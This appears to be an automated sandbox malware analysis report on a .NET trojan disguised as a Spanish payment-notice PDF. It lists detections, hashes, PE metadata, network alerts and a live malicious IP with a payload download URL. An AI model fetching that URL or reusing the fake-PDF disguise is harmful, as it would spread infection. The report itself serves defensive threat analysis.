                    Application Window Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common2
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    Account Discovery                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                    Software Packing                    		DCSync1
                    System Owner/User Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    Timestomp                    		Proc Filesystem1
                    File and Directory Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    DLL Side-Loading                    		/etc/passwd and /etc/shadow113
                    System Information Discovery                    		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Aviso de pago.pdf____________________________.exe24%ReversingLabsByteCode-MSIL.Trojan.Strictor
                    Aviso de pago.pdf____________________________.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    12.0.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    12.0.MSBuild.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                    12.0.MSBuild.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                    12.2.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    12.0.MSBuild.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                    12.0.MSBuild.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    http://195.133.18.17117%VirustotalBrowse
                    http://195.133.18.171100%Avira URL Cloudmalware
                    http://195.133.18.171/Znmtganqo_Wvetpunc.jpgT100%Avira URL Cloudmalware
                    http://195.133.18.171/Znmtganqo_Wvetpunc.jpg100%Avira URL Cloudmalware
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    http://WPfLXV.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://195.133.18.171/Znmtganqo_Wvetpunc.jpgtrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1MSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://DynDns.comDynDNSMSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://github.com/mgravell/protobuf-netiAviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://stackoverflow.com/q/14436606/23354Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/mgravell/protobuf-netJAviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haMSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://stackoverflow.com/q/11564914/23354;Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://stackoverflow.com/q/2152978/23354Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://195.133.18.171Aviso de pago.pdf____________________________.exe, 00000000.00000002.475264480.00000000028D1000.00000004.00000800.00020000.00000000.sdmptrue
                              • 17%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown
                              http://195.133.18.171/Znmtganqo_Wvetpunc.jpgTAviso de pago.pdf____________________________.exe, 00000000.00000002.475264480.00000000028D1000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://github.com/mgravell/protobuf-netAviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAviso de pago.pdf____________________________.exe, 00000000.00000002.475264480.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipAviso de pago.pdf____________________________.exe, 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://WPfLXV.comMSBuild.exe, 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  195.133.18.171
                                  		unknownRussian Federation
                                  		197695AS-REGRUtrue

                                  General Information

                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:626184
                                  Start date and time: 13/05/202217:17:182022-05-13 17:17:18 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 8m 46s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:Aviso de pago.pdf____________________________.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:21
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@8/1@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                  • Quality average: 100%
                                  • Quality standard deviation: 0%
                                  HCA Information:
                                  • Successful, ratio: 98%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Adjust boot time
                                  • Enable AMSI

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                  • TCP Packets have been reduced to 100
                                  • Excluded IPs from analysis (whitelisted): 23.3.109.212, 23.35.236.56, 20.190.159.4, 40.126.31.73, 20.190.159.75, 20.190.159.23, 40.126.31.67, 20.190.159.64, 40.126.31.69, 40.126.31.71, 20.82.210.154, 40.126.32.133, 40.126.32.140, 40.126.32.134, 40.126.32.136, 20.190.160.22, 20.190.160.20, 40.126.32.74, 40.126.32.76, 20.199.120.151, 20.199.120.182, 173.222.108.210, 173.222.108.226, 80.67.82.211, 80.67.82.235, 20.199.120.85, 20.54.89.106, 40.125.122.176, 20.223.24.244, 40.112.88.60, 52.152.110.14, 52.242.101.226
                                  • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, wu-bg-sh
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  17:19:20API Interceptor1x Sleep call for process: Aviso de pago.pdf____________________________.exe modified
                                  17:19:36API Interceptor360x Sleep call for process: MSBuild.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Aviso de pago.pdf____________________________.exe.log

                                  Download File
                                  Process:C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1214
                                  Entropy (8bit):5.355725642582145
                                  Encrypted:false
                                  SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7QJE4oE4KAE4Kx1qE4j:MxHKXwYHKhQnoPtHoxHhAHKzvQJHoHKO
                                  MD5:2717088AB018D5B447B894876B721386
                                  SHA1:C88136905BD0ACEAF8B31A73FB0B12F02D503DCA
                                  SHA-256:34109AB9D426B98603DA4B53D239CCD7A6E09F4C62277BE6B8D4675553A6736D
                                  SHA-512:71FF92D93D8EF19AF3E6E1E4A83EA427BC172DE5BD9C4F69EC28279C77A6586AAB38C4F1C1F66550729DCFC2D8764452D8DE47FBB1C15BCDD4D385EAE3883F14
                                  Malicious:true
                                  Reputation:moderate, very likely benign file
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data.SqlXml, Version=4.0.0.0, Culture=neutral, Public

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):5.9748366824969
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:Aviso de pago.pdf____________________________.exe
                                  File size:55296
                                  MD5:05b6b97166b339557424ca035418a640
                                  SHA1:e1699c9c10d6807650fcc35fc76c7744deeb16be
                                  SHA256:6797c9eb17e1ad3b41121bc80db0a97ae642bfca0874c8b7bd391507d2ca5540
                                  SHA512:0e2c6febd221d1c2e8a465dca46037ab6f826d5780c0ccb7bface146a15d1031124ddd5097b77f275a0714751559a77b8ea4cc4959c37d7ff336c6a3690ee7c8
                                  SSDEEP:768:RNXVU+bbYXAFM8VvlVjCRvaA5pXyLLqU6tqsDp+CH1S0ADhKDR:RPUcbMAlC4A54z6t9DHHgV+
                                  TLSH:72437C56B386C911C9E80A708C66DA780735FD818CC1A20F33D5BF6F7D322D6D686B66
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............>6... ...@....@.. ....................... ............`................................

                                  File Icon

                                  Icon Hash:c00b9b1b233d2dc2

                                  Static PE Info

                                  General

                                  Entrypoint:0x40363e
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                  Time Stamp:0xD0E49B7F [Mon Jan 20 23:55:43 2081 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:v4.0.30319
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x35ec0x4f.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000xbbb8.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x35d00x1c.text
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x16440x1800False0.529622395833data5.32361528176IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .rsrc0x40000xbbb80xbc00False0.582945478723data5.92398459334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x100000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_ICON0x42200x128GLS_BINARY_LSB_FIRST
                                  RT_ICON0x43580x2e8data
                                  RT_ICON0x46500x668dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
                                  RT_ICON0x4cc80x568GLS_BINARY_LSB_FIRST
                                  RT_ICON0x52400x8a8data
                                  RT_ICON0x5af80xea8data
                                  RT_ICON0x69b00x468GLS_BINARY_LSB_FIRST
                                  RT_ICON0x6e280x10a8data
                                  RT_ICON0x7ee00x25a8data
                                  RT_ICON0xa4980x5190PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                  RT_GROUP_ICON0xf6380x92data
                                  RT_VERSION0xf6dc0x2dcdata
                                  RT_MANIFEST0xf9c80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorExeMain

                                  Version Infos

                                  DescriptionData
                                  Translation0x0000 0x04b0
                                  LegalCopyright
                                  Assembly Version3.2.2.0
                                  InternalNameZnmtganqo.exe
                                  FileVersion3.2.2.0
                                  CompanyName
                                  LegalTrademarks
                                  Comments
                                  ProductName
                                  ProductVersion3.2.2.0
                                  FileDescription
                                  OriginalFilenameZnmtganqo.exe

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  195.133.18.171192.168.2.680497632848901 05/13/22-17:18:49.165848TCP2848901ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...)8049763195.133.18.171192.168.2.6

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 13, 2022 17:18:21.184160948 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.184326887 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.184356928 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.184406996 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.184443951 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.184463978 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.184494972 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.184516907 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.184529066 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.184535980 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.184562922 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.184633017 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.184643984 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.212052107 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212099075 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212126970 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212153912 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212181091 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212212086 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212240934 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212265968 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212294102 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212320089 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212344885 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212369919 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212395906 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212423086 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212826967 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.212857008 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213120937 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213148117 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213175058 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213201046 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213280916 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213311911 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213337898 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213363886 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213393927 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213418961 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213444948 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213471889 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213506937 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213537931 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213563919 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213593006 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213624954 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213654995 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213685036 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213716030 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213746071 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213777065 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213804960 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213855028 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.213881016 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.213939905 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:21.214126110 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.214329958 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.214675903 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.214706898 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.214735985 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.214761972 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.214792013 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.214886904 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.214914083 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.214939117 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.215084076 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.215111971 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.215203047 CEST44349720131.253.33.200192.168.2.6
                                  May 13, 2022 17:18:21.264159918 CEST44349720131.253.33.200192.168.2.6
